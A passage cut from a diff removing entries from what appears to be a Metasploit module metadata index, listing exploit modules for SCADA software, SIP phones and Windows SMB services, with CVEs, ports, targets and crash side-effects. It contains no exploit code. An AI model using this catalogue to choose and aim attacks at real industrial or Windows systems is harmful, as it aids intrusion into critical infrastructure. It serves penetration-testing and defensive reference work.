buffer overflow in DATAC Control\n International RealWin SCADA Server 2.0 (Build 6.1.8.10).\n By sending a specially crafted packet,\n an attacker may be able to execute arbitrary code.", - "references": [ - "CVE-2010-4142", - "OSVDB-68812" - ], - "platform": "Windows", - "arch": "", - "rport": 
912, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/realwin_scpc_txtevent.rb", - "is_install_path": true, - "ref_name": "windows/scada/realwin_scpc_txtevent", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/rockwell_factorytalk_rce": { - "name": "Rockwell FactoryTalk View SE SCADA Unauthenticated Remote Code Execution", - "fullname": "exploit/windows/scada/rockwell_factorytalk_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2020-06-22", - "type": "exploit", - "author": [ - "Pedro Ribeiro ", - "Radek Domanski " - ], - "description": "This module exploits a series of vulnerabilities to achieve unauthenticated remote code execution\n on the Rockwell FactoryTalk View SE SCADA product as the IIS user.\n The attack relies on the chaining of five separate vulnerabilities. The first vulnerability is an unauthenticated project copy request,\n the second is a directory traversal, and the third is a race condition. 
In order to achieve full remote code execution on all\n targets, two information leak vulnerabilities are also abused.\n This exploit was used by the Flashback team (Pedro Ribeiro + Radek Domanski) in Pwn2Own Miami 2020 to win the EWS category.", - "references": [ - "URL-https://www.thezdi.com/blog/2020/7/22/chaining-5-bugs-for-code-execution-on-the-rockwell-factorytalk-hmi-at-pwn2own-miami", - "URL-https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Miami_2020/replicant/replicant.md", - "URL-https://github.com/rdomanski/Exploits_and_Advisories/tree/master/advisories/Pwn2Own/Miami2020/replicant.md", - "CVE-2020-12027", - "CVE-2020-12028", - "CVE-2020-12029", - "ZDI-20-727", - "ZDI-20-728", - "ZDI-20-729", - "ZDI-20-730" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Rockwell Automation FactoryTalk SE" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb", - "is_install_path": true, - "ref_name": "windows/scada/rockwell_factorytalk_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/scadapro_cmdexe": { - "name": "Measuresoft ScadaPro Remote Command Execution", - "fullname": "exploit/windows/scada/scadapro_cmdexe", - "aliases": [], - "rank": 600, - "disclosure_date": "2011-09-16", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "mr_me ", - "TecR0c " - ], - "description": "This module allows remote attackers to execute arbitrary commands on the\n affected system by abusing via Directory Traversal attack when using the\n 'xf' command (execute function). 
An attacker can execute system() from\n msvcrt.dll to upload a backdoor and gain remote code execution. This\n vulnerability affects version 4.0.0 and earlier.", - "references": [ - "CVE-2011-3497", - "OSVDB-75490", - "BID-49613", - "URL-http://aluigi.altervista.org/adv/scadapro_1-adv.txt", - "URL-http://us-cert.gov/control_systems/pdf/ICS-ALERT-11-256-04.pdf", - "URL-http://www.measuresoft.net/news/post/Inaccurate-Reports-of-Measuresoft-ScadaPro-400-Vulnerability.aspx" - ], - "platform": "Windows", - "arch": "", - "rport": 11234, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/scadapro_cmdexe.rb", - "is_install_path": true, - "ref_name": "windows/scada/scadapro_cmdexe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/sunway_force_control_netdbsrv": { - "name": "Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57", - "fullname": "exploit/windows/scada/sunway_force_control_netdbsrv", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-09-22", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "Rinat Ziyayev", - "James Fitts " - ], - "description": "This module exploits a stack based buffer overflow found in the SNMP\n NetDBServer service of Sunway Forcecontrol <= 6.1 sp3. 
The overflow is\n triggered when sending an overly long string to the listening service\n on port 2001.", - "references": [ - "OSVDB-75798", - "BID-49747", - "URL-http://aluigi.altervista.org/adv/forcecontrol_1-adv.txt" - ], - "platform": "Windows", - "arch": "", - "rport": 2001, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/sunway_force_control_netdbsrv.rb", - "is_install_path": true, - "ref_name": "windows/scada/sunway_force_control_netdbsrv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/winlog_runtime": { - "name": "Sielco Sistemi Winlog Buffer Overflow", - "fullname": "exploit/windows/scada/winlog_runtime", - "aliases": [], - "rank": 500, - "disclosure_date": "2011-01-13", - "type": "exploit", - "author": [ - "Luigi Auriemma", - "MC " - ], - "description": "This module exploits a buffer overflow in Sielco\n Sistem Winlog <= 2.07.00. 
When sending a specially formatted\n packet to the Runtime.exe service, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2011-0517", - "OSVDB-70418", - "URL-http://aluigi.org/adv/winlog_1-adv.txt", - "URL-https://www.cisa.gov/uscert/ics/advisories/ICSA-11-017-02" - ], - "platform": "Windows", - "arch": "", - "rport": 46823, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Winlog Lite 2.07.00" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/winlog_runtime.rb", - "is_install_path": true, - "ref_name": "windows/scada/winlog_runtime", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/winlog_runtime_2": { - "name": "Sielco Sistemi Winlog Buffer Overflow 2.07.14 - 2.07.16", - "fullname": "exploit/windows/scada/winlog_runtime_2", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-06-04", - "type": "exploit", - "author": [ - "Michael Messner " - ], - "description": "This module exploits a buffer overflow in Sielco Sistem Winlog <= 2.07.16.\n When sending a specially formatted packet to the Runtime.exe service on port 46824,\n an attacker may be able to execute arbitrary code.", - "references": [ - "BID-53811", - "CVE-2012-3815", - "OSVDB-82654", - "EDB-18986", - "URL-http://www.s3cur1ty.de/m1adv2012-001", - "URL-http://www.sielcosistemi.com/en/download/public/winlog_lite.html" - ], - "platform": "Windows", - "arch": "", - "rport": 46824, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Sielco Sistemi Winlog 2.07.14/2.07.16 - Ceramics Kiln Project", - "Sielco Sistemi Winlog 2.07.14 - Automatic Washing System Project" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/scada/winlog_runtime_2.rb", - "is_install_path": true, - "ref_name": "windows/scada/winlog_runtime_2", - "check": false, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/yokogawa_bkbcopyd_bof": { - "name": "Yokogawa CENTUM CS 3000 BKBCopyD.exe Buffer Overflow", - "fullname": "exploit/windows/scada/yokogawa_bkbcopyd_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-10", - "type": "exploit", - "author": [ - "juan vazquez ", - "Redsadic " - ], - "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKBCopyD.exe when handling specially crafted packets. This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3.", - "references": [ - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", - "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities", - "CVE-2014-0784" - ], - "platform": "Windows", - "arch": "", - "rport": 20111, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Yokogawa CENTUM CS 3000 R3.08.50 / Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/yokogawa_bkbcopyd_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/yokogawa_bkbcopyd_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/yokogawa_bkesimmgr_bof": { - "name": "Yokogawa CS3000 BKESimmgr.exe Buffer Overflow", - "fullname": "exploit/windows/scada/yokogawa_bkesimmgr_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-03-10", - "type": "exploit", - "author": [ - "juan vazquez ", - "Redsadic " - ], - "description": "This module exploits an stack based buffer overflow on Yokogawa CS3000. 
The vulnerability\n exists in the BKESimmgr.exe service when handling specially crafted packets, due to an\n insecure usage of memcpy, using attacker controlled data as the size count. This module\n has been tested successfully in Yokogawa CS3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.", - "references": [ - "CVE-2014-0782", - "URL-https://www.rapid7.com/blog/post/2014/05/09/r7-2013-192-disclosure-yokogawa-centum-cs-3000-vulnerabilities", - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf" - ], - "platform": "Windows", - "arch": "", - "rport": 34205, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/yokogawa_bkesimmgr_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/yokogawa_bkesimmgr_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/yokogawa_bkfsim_vhfd": { - "name": "Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow", - "fullname": "exploit/windows/scada/yokogawa_bkfsim_vhfd", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-05-23", - "type": "exploit", - "author": [ - "Redsadic ", - "juan vazquez " - ], - "description": "This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability\n exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create\n logs using functions like vsprintf and memcpy in an insecure way. 
This module has been\n tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.", - "references": [ - "CVE-2014-3888", - "URL-http://jvn.jp/vu/JVNVU95045914/index.html", - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf", - "URL-https://www.rapid7.com/blog/post/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow" - ], - "platform": "Windows", - "arch": "", - "rport": 20010, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb", - "is_install_path": true, - "ref_name": "windows/scada/yokogawa_bkfsim_vhfd", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/scada/yokogawa_bkhodeq_bof": { - "name": "Yokogawa CENTUM CS 3000 BKHOdeq.exe Buffer Overflow", - "fullname": "exploit/windows/scada/yokogawa_bkhodeq_bof", - "aliases": [], - "rank": 200, - "disclosure_date": "2014-03-10", - "type": "exploit", - "author": [ - "juan vazquez ", - "Redsadic " - ], - "description": "This module exploits a stack based buffer overflow in Yokogawa CENTUM CS 3000. The vulnerability\n exists in the service BKHOdeq.exe when handling specially crafted packets. 
This module has\n been tested successfully on Yokogawa CENTUM CS 3000 R3.08.50 over Windows XP SP3 and Windows\n 2003 SP2.", - "references": [ - "URL-http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0001E.pdf", - "URL-https://www.rapid7.com/blog/post/2014/03/10/yokogawa-centum-cs3000-vulnerabilities", - "CVE-2014-0783" - ], - "platform": "Windows", - "arch": "", - "rport": 20171, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Yokogawa CENTUM CS 3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ]" - ], - "mod_time": "2022-01-23 15:28:32 +0000", - "path": "/modules/exploits/windows/scada/yokogawa_bkhodeq_bof.rb", - "is_install_path": true, - "ref_name": "windows/scada/yokogawa_bkhodeq_bof", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/sip/aim_triton_cseq": { - "name": "AIM Triton 1.0.4 CSeq Buffer Overflow", - "fullname": "exploit/windows/sip/aim_triton_cseq", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-07-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in AOL\\'s AIM\n Triton 1.0.4. 
By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", - "references": [ - "CVE-2006-3524", - "OSVDB-27122", - "BID-18906" - ], - "platform": "Windows", - "arch": "", - "rport": 5061, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "AIM Triton 1.0.4 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/sip/aim_triton_cseq.rb", - "is_install_path": true, - "ref_name": "windows/sip/aim_triton_cseq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/sip/sipxezphone_cseq": { - "name": "SIPfoundry sipXezPhone 0.35a CSeq Field Overflow", - "fullname": "exploit/windows/sip/sipxezphone_cseq", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-07-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in SIPfoundry's\n sipXezPhone version 0.35a. 
By sending an long CSeq header,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", - "references": [ - "CVE-2006-3524", - "OSVDB-27122", - "BID-18906" - ], - "platform": "Windows", - "arch": "", - "rport": 5060, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "sipXezPhone 0.35a Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/sip/sipxezphone_cseq.rb", - "is_install_path": true, - "ref_name": "windows/sip/sipxezphone_cseq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/sip/sipxphone_cseq": { - "name": "SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow", - "fullname": "exploit/windows/sip/sipxphone_cseq", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-07-10", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a buffer overflow in SIPfoundry's\n sipXphone 2.6.0.27. 
By sending an overly long CSeq value,\n a remote attacker could overflow a buffer and execute\n arbitrary code on the system with the privileges of\n the affected application.", - "references": [ - "CVE-2006-3524", - "OSVDB-27122", - "BID-18906" - ], - "platform": "Windows", - "arch": "", - "rport": 5060, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "SIPfoundry sipXphone 2.6.0.27 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/sip/sipxphone_cseq.rb", - "is_install_path": true, - "ref_name": "windows/sip/sipxphone_cseq", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/cve_2020_0796_smbghost": { - "name": "SMBv3 Compression Buffer Overflow", - "fullname": "exploit/windows/smb/cve_2020_0796_smbghost", - "aliases": [], - "rank": 200, - "disclosure_date": "2020-03-13", - "type": "exploit", - "author": [ - "hugeh0ge", - "chompie1337", - "Spencer McIntyre" - ], - "description": "A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to\n execute code on a vulnerable server. This remove exploit implementation leverages this flaw to execute code\n in the context of the kernel, finally yielding a session as NT AUTHORITY\\SYSTEM in spoolsv.exe. 
Exploitation\n can take a few minutes as the necessary data is gathered.", - "references": [ - "CVE-2020-0796", - "URL-https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html", - "URL-https://github.com/chompie1337/SMBGhost_RCE_PoC", - "URL-https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s", - "URL-https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems", - "URL-https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows", - "URL-https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 10 v1903-1909 x64" - ], - "mod_time": "2022-03-10 18:03:35 +0000", - "path": "/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb", - "is_install_path": true, - "ref_name": "windows/smb/cve_2020_0796_smbghost", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "SMBGhost", - "CoronaBlue" - ], - "Stability": [ - "crash-os-restarts" - ], - "Reliability": [ - "repeatable-session" - ], - "RelatedModules": [ - "exploit/windows/local/cve_2020_0796_smbghost" - ], - "SideEffects": [] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/generic_smb_dll_injection": { - "name": "Generic DLL Injection From Shared Resource", - "fullname": "exploit/windows/smb/generic_smb_dll_injection", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-03-04", - "type": "exploit", - "author": [ - "Matthew Hall " - ], - "description": "This is a general-purpose module for exploiting conditions where a DLL can be loaded\n from a specified SMB share. 
This module serves payloads as DLLs over an SMB service.", - "references": [ - "CWE-114" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/generic_smb_dll_injection.rb", - "is_install_path": true, - "ref_name": "windows/smb/generic_smb_dll_injection", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/group_policy_startup": { - "name": "Group Policy Script Execution From Shared Resource", - "fullname": "exploit/windows/smb/group_policy_startup", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-01-26", - "type": "exploit", - "author": [ - "Sam Bertram ", - "juan vazquez " - ], - "description": "This is a general-purpose module for exploiting systems with Windows Group Policy\n configured to load VBS startup/logon scripts from remote locations. This module runs\n a SMB shared resource that will provide a payload through a VBS file. Startup scripts\n will be executed with SYSTEM privileges, while logon scripts will be executed with the\n user privileges. Have into account which the attacker still needs to redirect the\n target traffic to the fake SMB share to exploit it successfully. 
Please note in some\n cases, it will take 5 to 10 minutes to receive a session.", - "references": [ - "URL-http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html", - "URL-https://github.com/GDSSecurity/BadSamba" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows x86", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/group_policy_startup.rb", - "is_install_path": true, - "ref_name": "windows/smb/group_policy_startup", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "badsamba" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ipass_pipe_exec": { - "name": "IPass Control Pipe Remote Command Execution", - "fullname": "exploit/windows/smb/ipass_pipe_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-01-21", - "type": "exploit", - "author": [ - "Matthias Kaiser", - "h0ng10 " - ], - "description": "This module exploits a vulnerability in the IPass Client service. This service provides a\n named pipe which can be accessed by the user group BUILTIN\\Users. 
This pipe can be abused\n to force the service to load a DLL from a SMB share.", - "references": [ - "CVE-2015-0925", - "OSVDB-117423", - "BID-72265", - "URL-http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows x32", - "Windows x64" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ipass_pipe_exec.rb", - "is_install_path": true, - "ref_name": "windows/smb/ipass_pipe_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms03_049_netapi": { - "name": "MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow", - "fullname": "exploit/windows/smb/ms03_049_netapi", - "aliases": [], - "rank": 400, - "disclosure_date": "2003-11-11", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the NetApi32 NetAddAlternateComputerName\n function using the Workstation service in Windows XP.", - "references": [ - "CVE-2003-0812", - "OSVDB-11461", - "BID-9011", - "MSB-MS03-049" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows XP SP0/SP1" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms03_049_netapi.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms03_049_netapi", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms04_007_killbill": { - "name": "MS04-007 Microsoft ASN.1 Library Bitstring Heap Overflow", - "fullname": 
"exploit/windows/smb/ms04_007_killbill", - "aliases": [], - "rank": 100, - "disclosure_date": "2004-02-10", - "type": "exploit", - "author": [ - "Solar Eclipse " - ], - "description": "This is an exploit for a previously undisclosed\n vulnerability in the bit string decoding code in the\n Microsoft ASN.1 library. This vulnerability is not related\n to the bit string vulnerability described in eEye advisory\n AD20040210-2. Both vulnerabilities were fixed in the\n MS04-007 patch. Windows 2000 SP4 Rollup 1 also patches this\n vulnerability.\n\n You are only allowed one attempt with this vulnerability. If\n the payload fails to execute, the LSASS system service will\n crash and the target system will automatically reboot itself\n in 60 seconds. If the payload succeeds, the system will no\n longer be able to process authentication requests, denying\n all attempts to login through SMB or at the console. A\n reboot is required to restore proper functioning of an\n exploited system.\n\n This exploit has been successfully tested with the win32/*/reverse_tcp\n payloads, however a few problems were encountered when using the\n equivalent bind payloads. 
Your mileage may vary.", - "references": [ - "CVE-2003-0818", - "OSVDB-3902", - "BID-9633", - "MSB-MS04-007" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 SP2-SP4 + Windows XP SP0-SP1" - ], - "mod_time": "2022-07-10 00:07:26 +0000", - "path": "/modules/exploits/windows/smb/ms04_007_killbill.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms04_007_killbill", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "kill-bill" - ], - "Reliability": [ - "unreliable-session" - ], - "Stability": [ - "crash-os-restarts", - "crash-service-down" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms04_011_lsass": { - "name": "MS04-011 Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow", - "fullname": "exploit/windows/smb/ms04_011_lsass", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-04-13", - "type": "exploit", - "author": [ - "hdm " - ], - "description": "This module exploits a stack buffer overflow in the LSASS service, this vulnerability\n was originally found by eEye. When re-exploiting a Windows XP system, you will need\n need to run this module twice. 
DCERPC request fragmentation can be performed by setting\n 'FragSize' parameter.", - "references": [ - "CVE-2003-0533", - "OSVDB-5248", - "BID-10108", - "MSB-MS04-011" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Automatic Targetting", - "Windows 2000 English", - "Windows XP English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms04_011_lsass.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms04_011_lsass", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms04_031_netdde": { - "name": "MS04-031 Microsoft NetDDE Service Overflow", - "fullname": "exploit/windows/smb/ms04_031_netdde", - "aliases": [], - "rank": 400, - "disclosure_date": "2004-10-12", - "type": "exploit", - "author": [ - "pusscat " - ], - "description": "This module exploits a stack buffer overflow in the NetDDE service, which is the\n precursor to the DCOM interface. This exploit effects only operating systems\n released prior to Windows XP SP1 (2000 SP4, XP SP0). 
Despite Microsoft's claim\n that this vulnerability can be exploited without authentication, the NDDEAPI\n pipe is only accessible after successful authentication.", - "references": [ - "CVE-2004-0206", - "OSVDB-10689", - "BID-11372", - "MSB-MS04-031" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 SP4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms04_031_netdde.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms04_031_netdde", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms05_039_pnp": { - "name": "MS05-039 Microsoft Plug and Play Service Overflow", - "fullname": "exploit/windows/smb/ms05_039_pnp", - "aliases": [], - "rank": 400, - "disclosure_date": "2005-08-09", - "type": "exploit", - "author": [ - "hdm ", - "cazz " - ], - "description": "This module exploits a stack buffer overflow in the Windows Plug\n and Play service. 
This vulnerability can be exploited on\n Windows 2000 without a valid user account.\n\n NOTE: Since the PnP service runs inside the service.exe process, a failed\n exploit attempt will cause the system to automatically reboot.", - "references": [ - "CVE-2005-1983", - "OSVDB-18605", - "BID-14513", - "MSB-MS05-039" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 SP0-SP4", - "Windows 2000 SP4 French", - "Windows 2000 SP4 Spanish", - "Windows 2000 SP4 Universal", - "Windows 2000 SP0-SP4 German", - "Windows 2000 SP0-SP4 Italian", - "Windows XP SP1 English", - "Windows XP SP2 English (Requires Admin)", - "Windows Server 2003 SP0 English (Requires Admin)", - "Windows Server 2003 SP1 English (Requires Admin)" - ], - "mod_time": "2021-11-28 13:39:05 +0000", - "path": "/modules/exploits/windows/smb/ms05_039_pnp.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms05_039_pnp", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_025_rasmans_reg": { - "name": "MS06-025 Microsoft RRAS Service RASMAN Registry Overflow", - "fullname": "exploit/windows/smb/ms06_025_rasmans_reg", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-06-13", - "type": "exploit", - "author": [ - "pusscat ", - "hdm " - ], - "description": "This module exploits a registry-based stack buffer overflow in the Windows Routing\n and Remote Access Service. 
Since the service is hosted inside svchost.exe,\n a failed exploit attempt can cause other system services to fail as well.\n A valid username and password is required to exploit this flaw on Windows 2000.\n When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.\n Exploiting this flaw involves two distinct steps - creating the registry key\n and then triggering an overwrite based on a read of this key. Once the key is\n created, it cannot be recreated. This means that for any given system, you\n only get one chance to exploit this flaw. Picking the wrong target will require\n a manual removal of the following registry key before you can try again:\n HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook", - "references": [ - "CVE-2006-2370", - "OSVDB-26437", - "BID-18325", - "MSB-MS06-025" - ], - "platform": "Windows", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows 2000 SP4" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/smb/ms06_025_rasmans_reg.rb", - "is_install_path": true, - "ref_name": "windows/smb/ms06_025_rasmans_reg", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/smb/ms06_025_rras": { - "name": "MS06-025 Microsoft RRAS Service Overflow", - "fullname": "exploit/windows/smb/ms06_025_rras", - "aliases": [], - "rank": 200, - "disclosure_date": "2006-06-13", - "type": "exploit", - "author": [ - "Nicolas Pouvesle ", - "hdm " - ], - "description": "This module exploits 